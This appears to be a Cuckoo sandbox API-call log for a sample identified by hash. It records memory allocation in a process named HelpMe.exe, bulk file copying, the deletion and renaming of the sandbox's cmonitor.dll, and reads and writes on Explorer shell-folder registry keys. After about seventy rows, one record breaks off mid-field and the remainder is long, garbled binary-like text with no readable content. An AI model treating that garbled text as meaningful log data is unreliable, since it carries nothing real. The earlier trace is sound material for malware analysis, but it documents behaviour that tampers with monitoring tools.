"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->12288"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->12288"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->268"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->268"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\dll\cmonitor.dll"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\dll\cmonitor.dll.exe","lpNewFileName->C:\cuckoo\dll\cmonitor.dll"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000140","lpFileName->C:\cuckoo\dll\JWAGXd.dll","dwDesiredAccess->GENERIC_READ"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->268"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000140","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000011c","lpFileName->C:\cuckoo\dll\JWAGXd.dll","dwDesiredAccess->GENERIC_READ"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000013c","lpValueName->Desktop"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x0000013c","lpValueName->Desktop","dwType->1","lpData->C:\Documents and Settings\janettedoe\Desktop","cbData->90"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->0x0000013c","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->Generation"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->Common Desktop"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->Common Desktop","dwType->1","lpData->C:\Documents and Settings\All Users\Desktop","cbData->88"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->0x000001d4","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000013c","lpValueName->Generation"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->0x00000128","lpSubKey->FileExts"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000013c","lpSubKey->."
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000013c","lpSubKey->."
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000001d4","lpFileName->C:\cuckoo\dll\JWAGXd.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001d4","nNumberOfBytesToWrite->61440"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToRead->47554"
"20190731003628.343","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","file6 ,8*.c`}
^zD\TKF|P`UVTGlM{P
0\SgAP
gwoascc
BDEQ\q
RzC? &
DU\fQDE@kBr
AhyQ{t
GKtNKrZZG
yQTRaGHP
^{UIuHg
/Lc{|dku
{ii{k~
amngzss~py#
	e`f7|
YDC[[1S
V]]TEWGGSO
dlr%vd2
C1]6VX]N
BRTXCDAO
aQTm\GZyU[iZo
elt%t``
\)s :h|~wv.i/xw~}{$G
qUQBU]~{r'5<
#[~~G_
gEZEUv]]T
`caogbg
C[W]Kw
2]fDZES
PQUYQXPA
d\P7DVA@5R
f6zq!gkG
kcNWCHJDR^
fTPRh]_S
ba{aiq5
$KES@eY`
FVEEQ@@I
F\Y-TJvA4
HF51vrrej
smj-*w {>
NFcE@gG
DR6**'1(1qIV"
Kyod[\T
`dssqbb
!OESEaWnJ
5@TEOoT
LW!LoG
@2m& rcb
\}QLL[
@R`Q\WIl
jetptcc
EeYdPY]
FJFgTPgLP
IAderwr1e@
Y["Q`M6
aerzud`
\\/QA O5C
G0bsrqd1
OF])TM
disionca'%3(2:;=+(
/bd[\T
LbW\V]PcD$L
G1RW`AR
O4XXCQp
2g 'p1b
UCICDU	
	+CAG~k
:6'6O|CPXK
_x[YQSPcDsMLG_v	b
Q3LQDMc
". ~mqUQVIO8'
_~EYSTDaRqOVIQe[oPEV
IAEUV]D
qyauucq
UCICDU	
kW$.gu}
cojkbgJjK
~KR3UI
(&XL@SVV[oPAY^WldVEE@
90 <tMNWIg
nmqqiq7
Z\@cER{
Z]VTSQ
JiI[Eu-2hgo;|qccuc;fmcvN\t
}MxxAW`PMX
DENTBNEVIOPIE-
(a'- }@Kazy
]@cFTy]W
gMJVCSBGpoQT@_EVQ
:'@CESWA5\@
pXZSbQMP2
ps,-ckv
\EjK]TyWOI
	)V2ZI
6$dENGbC
ES[__l
XNph;1
aUCOYTVaQSXe]M\PPdCXJ
[P^VTV
WCXGwX[Su
P62*01!*
WaEUBHg
0'7"!rl~J
V^[pIC6#
7XS*.7
N}YWP{T@
	`^VDDW@]r~\WPCQ[TD~{KVS]GEet
Z_ke\A
a0"u|`j
ZBUWYCDDK
%Ipq;41*+4
CBFNIPJFo[
_EbC@WQ|QOI
dWB@PT
aRPR R
SV_EAJ@
N@1VQ5
WCOePZG
0e&q!`j
/Ywqstjc
GG^U\e
S_}SL}Ao@NA`c'%wbe
\-ygu}}~twnso3&/ =1PU
* 7< MJVl/Y^T_GCDzvpa
.7*6#!
6%1!.$''lH(
\AjEUxTI
e]^ZDWFGpo]QBM_M^Cng_WS	F@oz
cTEEPZ
MAdTQg@]KA4
ww{)4d|
^_aqubj
CTEuXV
@PG:hC
cSQzH\V)
efruw62
y|s{sn=&&%,93:jel
H{+8DXU2'&
:0PCQMJV4
ThxaSSY\`VGY
	W]P	\
UK_VCH
&*<)	GZG
d\WDGRDWdcZUFM_MRFluEL\XECjzB
CV]M5V
CSQ\KMJ
}AS]zSK 
d6s&w7`
DM<9<{sn
("0GiZ;R
[_VGA~+>
HPD;_^DB_\7QVpa
2oYV6-
qJgGIU
3ZP]TDZDcJAU
@BMZADPY^YXMV
woau+c
]D~CAGEuM
]@cASzSW
eMJVFUJGpo
	FVQMm1ZY
XE`SGKPW
	@TDodEW
AeQVU[Cv
VKJA;hG
EKVM[D[LEXUFYMB
dFHD7`rtsjfA
FVQK_VCM
jm" sbe
SO[bG^Q^_VZ
!(PWWXJDEJ
aSUw^VX
qmtquej
Z|s n=-w&"{o|ut*
W@CC^Gj}YA^M
FCU!9$$
G' 3aHYq
PwVTTK
RFJFGTP_JA
aQ]AR'N5
g`"&q2dC
GZG?wNIgac
jgg?j/)vx{f|'p
XUA^E]
\VzGCB^YLpU
`UVhERAHfQ_CW}Vd
]H]{_VxR
~xq.71v
[zSKH_
^WIlP\R
5GZG>Gj[WWBHoQ[FTuHd
(SHsNb
17 ps75
+}'<mncap}h{coj;+"K_V
2~aK%3&?:41~{KLHM
8E7ybs
BBU^Df
BPc}zn]W}\FR_B
	W]P	\
UK_VCH
KNP'30
w~gqyaaiq;iI[
+LS6hj
(	@xmnWFTU
PSWYQXP
2PUt'-<)
*:lro5qsxy~tF
DyVpBSmiQPVUrEUPWJ]
~GV~GSLgG
>QXP?cen
7"m\GLgG
c`}}9sxy~u
*?+;.1$
"-*+ +6~aK
PbyMTDmk@T
NG@GKKBEEO
2GUg*2EcR6;
>qy|ebtF
wHTZECZ^^
|FFQA]EhD
CQUF|MY\dJ^M
kUPbDUBMgPZ[QvNu
ryk`w4pAJ
JKT_GV^[
pIEwGW^}\N#Id
Au%-*1gt
Z/QAH	**}<<{
ru{={#z|
gMJVAQBGpr
|ztoqx|uc`}|u{jel#
ODYIdLS-VNL
jaYZ\[P]
	A^PGma[
]JD@GA
|MMFt^PBWKN1
j6p'!57
%^\TzV
EWGGSO
D`b"s j7
@NA_F"
^TxR\S
YTPM[P
^G_RG[_VQ_
aJRSDS
A`1'%!fb
GvXXR,W
hiO9d(g$n
FAtUQEP
r($*	;+1> <
asub1cs
[CwY\Q
XV_JCAQ
cwoa#:?G_[C
;GbC>0n}
&r/w1-v=cquf
/nUvUBPBRWpSSQBB
svxg~krkjgmfD8iD
eesaiq5K@GQUQ
QDUvY\
6.'6!mJ`I
UCd_bT
YEu_NhDC_U
oRES_^^jJX_jMZHRsu
ODQNs\B
sd|{fj'#'
rQ	R@M
66tstgd@
	QL	QJST
LJSs\_Su/&
aerzud`
?YG\Uru
Zt|w&d+&mpicu
eil#;%&,.!=1(
!(pWQU
`cq{k`k
*@\USKz
}	RS-Y
bcuv}jk@NA
ICZIuP[
u*x),|dc
TY]\CN@EU]
o\ZLQdENQ
w{twce
RX]S]M@BGA
D`b"s j7
	\[@NA_F"
^TxR\S
oi~3u9A
NGVUhGBXESFmA
^G41+(pea
!(JtY]\
BlA_RG^m^uKDSJc	cVR]N
\S[ZJ@
S]w_]YQ 
jb s a7
aC[VId
 ZId:9&n{
#K@GANq
_{A]RUPcD&
	1BiD\AV
S_wNaeASDXV^cJAU
bTUS$_
f4&w$d2
XlYOSQJmJ`
C6a"t$a0F
ZVY\UCHB@GA
Z}CONGC{^`UV
F7	bK^MTK
C6a"t$a0F
ZVY\UCI
Z}CONGC{^`UV
F7	g\V]
\r_XPCI
2b"q&7f@
\UCICETY
]u_Nh'
X`A^TG^mWvAVIQ2Z4
]r_XPCI
2b"q&7f@
\UCICD
*Dn['00
]u_Nh'
X`A^TG^mWvAVIQ2Z1
2g 'p1b
XvK@GKW\
CICDU\
mJ`*!&0
CCVVDmJ`H@]QxM1G
0\URr\
2g 'p1b
XvK@GKW\
CICDU]@
CCVVDmJ`H@]QxM4P
\QWW]_
NCEQZ@
@nF_@P'
01v!tgg
M{PKXGEx_YP
^zD\TKF|P`UVTGlM{P
01v!tgg
@jGMF('
:16 vCpGMFEx_YP
^zD\TKF|P`UVTGlM~G
OFf7rwqq
fC]VId
<'6QxMu^K
_~EYSTDaRqOVIQe[oPEV
OFf7rwqq
+WA@6'
*'G_vM~G	"DRS
_~EYSTDaRqOVIQe[jGMFK
@bawaiqe
gBXEQdEN
lYO101
*VIQvCu
Y}D]RQC~PlMGSQxMfFQVI
IAQY]QD
@bawaiqe
~K@GLbW>7&1
[XGQxM:#
Y}D]RQC~PlMGSQxMcQYF
gwoascc
gBYDTw]NI
Bl&8!&7
5`UVG_v
W~B^SUB{WsOZQ@bM{PX@]
gwoascc
Dn[VIQ<);	
W~B^SUB{WsOZQ@bM~GPP
@GBQXCI
/BYDUvX]Q
6.'6!mJ`[XG
VvHES]`\aPEVT
*UQTvY\
6(16PcD`UV
VvHES]`\dGMF
eesaiq5K@GQUQ
DUvY\T
0>1G^mDn[
!(L|E\[UE|WrI@TBbAcA_VI
eesaiq5K@GQUQ
&>@IPmJ`
!(L|E\[UE|WrI@TBbAfVWF
cwoa#:?G_[QXG
dEN2_WD
&ONGPcD*?
cDW_RTK
QqHDUGe^a\]GS
@_]ZQF
cwoa#:?G_[QXG
dEN7H_T>Y\U
1maog=
WA@G^m
^j_*UQT
cDW_RTK
QqHDUGe^dKUW
X@QdENS
w%*)6 [_VGA
bdwaiq=lYO@IP' +
Xlxg@WB~_rNGTCd[fC_ZQ
0TUPdENS
w%*)6 [_VGA
qLbWONG
Y[C,_bUQT
Xlxg@WB~_rNGTCd[cTWJ
WUPVPP
@fF]VId_\U
5</&6* VIO
cerrqq
d_gBYE
[}COooP}Vs@DR@e_gFXES
fQCHd_\U
5</&6* VIO
cess'kq
Cd_bUP
[}COooP}Vs@DR@e_bQPU
cPEVSvYNI
JK?00:6'6O
cesstbg
UCd_gC
X{@^TG
EDpIE\Cc\fBY@T
pICRvYNI
JK?00:6'6O
Zcessuc1
DUCd_c
X{@^TG
EDpIE\Cc\cUQP
{P_DUdEN
K@G ,07 >q
+essucb
_qV:IDUCd^2BKXGCpFXS\CmkH[FUBm_`AXDU
_	QQZP
pSQTdEN
K@G ,07 >q
pGMF./
c-ssucc
rIDUCe
fGMFCpCXWVDmkH[FUBm_eVPT
u_@[jK
$[_V68aog
!KXGdEN	RiZ:&7*+4
K@GlMO
kW/_qX
,PsOBPKmW5
XB~G[dQ[W~WTRK
G2czp|d0
Z\@qTTB
vY]PzQ]U
<.*hfsv
w=~ubyrobuch
kfr@_E\SC
~GWTvK@GDEN6&:016>
+essucc@
_qV:IDUCd^6
P|CU@hxmTrHMUDg^bUUU
a^GWDUdEN
>NIQ*&7&(q
:NIlCAGEx*V9K
GW*DTZ
yWtOA]Jl
FCvUQEP]SsSU\D
t|-v6-%;gtvr
ZTEOFL\U@NAaS
64uzvjdA
gasaHYq
]DdENQ|QOI
lwlc)tkvzMq%0DH
[$r~tf~!i0|ur
W]TG_[
GR'Y	\F
k4 utee
A^+G	Q\K,P 
FG_v^fE_VI
X_]QGIQyoO
zBRREUvZZWo
gwoaqac
8um1x'9}&Muqe
eilsbyasp#((E
Y41+(pea
cdzsr`b
B*_&HM]
7YcSWQ
rQ	R5C
G0bsrqd1
w]XGbC[U
p~H5<,#</
P\Au^K
6 &6 ~
kglip!
wu~uc,s}{p'
0OooP}Vs@DR@e_gFXES
XWQkCaY^DPCNDEN6&:016>
me;succ
B_\s_U
Z^~A	RUBwDn[
Yz_rEUPWJ}]KQ
!BVWQE1_
@]Dv[XGEbUVYP
`FKXG*
G^N2%3&!~m
XvY\G 4
_x[YQSPcDsMLG_v	b
01v!tgg
VX]UQUQ
Hx50K~aM&;7
*:=VaCLME
4K@GIIt
CYBUTp
SG_QCp4967;
<'G~^MeBXMU
ZXvY\U
TGy^&_LXP
_qV:IDS
d_gJKXGAN{XzWklG@
_}LnWRTUP
E~BB{@
@X-L@tAS
PBG HRU
$ P@CR\G
QiWQ[^VlS_]l_B[Rqc
&TB]AIkYs_LXP	
NIQ*&7&(q
*aCLV^M
.IR\$_F^Z&,MTN@
Y|DDrFPT]\gXNG
IA[@~BR
VYXTBO]@V[
rF]CXG \
b3pt$c6
q_=ULPRX
[EBMCT
gmfqXIawcb
di}nmscke#
gll0v6FJFYAdC[~
?zYRFX
EbQP_KY^lgTR
t5/5apt<96. q^(
R^zQN'N5
g`"&q2dC
(4qs&7e
vTEZCSV$
]w |!apz<d'$v
ATWY@B@A
fGKsAWB[zCTBWuNn
`fz v77DH
WXZKGJEVIO
d4s&|7b
 []S}P[WH_u
E>KUKXKV_XDG
z{gu}{b`bswc9d`vkA
7@S|S@
j5PZR[B
CG]MB~sH@NCP
KBV0@9"$&
^_aqubj
NArQNIl
]\K=MQXB_RVVJ
UAwTE[
!:`gmf
qgbg ,$6$&;-g
A\^|VHuHd
dYCMEV_p\\[RtN
ewoatgk
#JTpZ]S
[)SUCtRMU
GQWYCV^[F[q;
|KSGLeWNYG#
N@M047**=
V]aBMXG
sGcoPSDXV^
DENTBNEVIODEN7
a!0"7 
K=)BKXEd[YLyGC\QV\B
TGwSAQ\QVuAOGGA
mvle{rcmr5
WBO@ES_GM
0c!&wq
*u^KVI
VrTB]SG 4
VOg[q[LXP[^sMHG
-[sBP_P
QL	QJST
\@mYV$
T~K@GLcW'
6%#6!qEXG
\A'IVIQ<+
UBf_4]YP
fCB@T]
uCXCSdEN
GZK00aog
6TEAGeM+)
cesst7g
d_gBYET
PCyMNeLFB^UsXWT
\ReLzBTVSK
Xp[!LT
qN\`[XG
XRWQRSVP]
rK@G /
(LPWVQF
/nUvUBPBRWpSSVEA
uf`pe`afuq
bbuaiq7GZKAI
D]U1_s_^DC
<!777mJ`[XG
T@z^s_]B@WBw]PG
A{AVnWPVUP
K)0n}u+c
PdEN	]|I
UCbUDD
]SWB)^zMVIQ8
	LNFTP
NGTK@GBHDBGA
dEN3K^V&4/
)?<AiZ
GNuZhLK^U
xR_A}U
XRmFP@UQ_
VDX[Y6O
@WXdPCVSSD
Y\UCICDQO/&
eBXMUqZ]U
bcmwqeq
TTDySz@L
DEN]DKCB\ZD
elv |a7
~Rv[XGEd_pIC
DRSBMGDG`(
bTXTqZ]U
bcmwqeq
TTDySz@L
JKTRAIEMR
f6zq!gkG
TF{Dn[BUCvCu
^GEEQY
/]P[DT
gdrukgg
D~PtLL\K6
DQ[WCOJC
f6zq!gkG
TF{Dn[BUCvCp
HMOB@Q]
!(pWQU
gdrukgg
D~PtLL\K6
^^^UE@D
Ajg'w}6d@M
\VQPcDtIDG_v	>
cVWvXUU
cewrte}
,PsOBPKmW5
Q[\SJN
Ajg'w}6d@M
\VQPcDtIDG_v	;	
_oCVvXUU
cewrte}
,PsOBPKmW0
ATq_UPA
7a{&r12
AY@IPyVr[XG
cBKyod[\T
`dssqbb
!OESEaWnJ
TUq_UPA
7a{&r12
AY@IPyVr[XG
bGlnd[\T
`dssqbb
!OESEaWk]
^FHD3GXCS
k0t!$k6A
ZzWA@SB
fF]DGKcNW
cbprucg
SBbYbJPL
V	FJFgTVR
k0t!$k6A
ZzWA@SB
fQQFKcNW
cbprucg
SBbYg]X\O\U
fE_MP%P^
Gd7"{ 0d
LbW[RUPcD$
iDX@QvKao
blstvbc
b^aD\L\
eSXQ%P^
Gd7"{ 0d
LbW[RUPcD$
dTUPvKao
blstvbc
b^dST\
@2m& rcb
LxE]@IP)
:PEV2_WBTr]\G/&
aerzud`
@2m& rcb
LxE]@IP)
[WUr]\G/&
aerzud`
rQ	R@M
66tstgd@
	QL	QJST
Y[pXXQ
/Ywqstjc
OD[wBTS
VRA><FT
rQ	R@M
66tstgd@
	QL	QJST
LZpXXQ
/Ywqstjc
OD[wBTS
IAderwr1e@
qXIawcb
(@TU\C)Uu
IAderwr1e@
